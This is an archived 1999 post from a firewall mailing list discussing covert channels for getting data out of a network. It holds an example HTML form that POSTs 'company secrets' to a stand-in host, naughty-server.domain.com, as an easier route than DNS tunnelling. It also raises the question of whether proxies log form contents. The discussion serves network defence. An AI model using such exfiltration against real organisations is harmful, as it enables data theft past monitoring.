Firewall Wizards mailing list archives
RE: Covert Channels (was dns outbound)
From: "Mayne, Peter" <Peter.Mayne () compaq com>
Date: Mon, 31 May 1999 14:43:14 +0800
Why bother with low-bandwidth DNS traffic? Write yourself a .htm file containing the following: <form action="http://naughty-server.domain.com/accept.cgi" method="post"> <input type="text" name="i1" value="Here are the company secrets."> <input type="text" name="i2" value="Widget V2 will be released on 1-Jul-1999." <input type="submit" name="submit" value="Send Secrets"> </form> (It's obviously a trivial exercise to write a Perl script that takes a Word document and MIME encodes it appropriately.) Load the file into your favourite browser, hit the submit button, and let accept.cgi write the form data somewhere convenient. How many proxies will log the contents of the form? Shouldn't this data be logged somewhere? (Of course, if you don't log the contents of your outgoing mail, why bother logging this stuff? Not to mention those pocket-sized DATs.) HTTP has always been a quick and easy way of sending data. It doesn't help that everyone on the planet (and probably some off it) is using HTTP as a transport for whatever they happen to be interested in (RealPlayer, Microsoft's DCOM, SETI@Home 8-). Stopping covert channels on a system is frightfully difficult. How do you stop someone from doing Morse code using CPU usage, for instance. (Three short do-nothing loops, three long do-nothing loops, three short do-nothing loops.) PJDM ---- Peter Mayne, Compaq Computer Australia, Canberra, ACT These are my opinions, and have nothing to do with Compaq. "The wise man knows that he knows nothing." - Bill. "That's us, dude!" - Ted.
Current thread:
- RE: Covert Channels (was dns outbound) Mayne, Peter (Jun 01)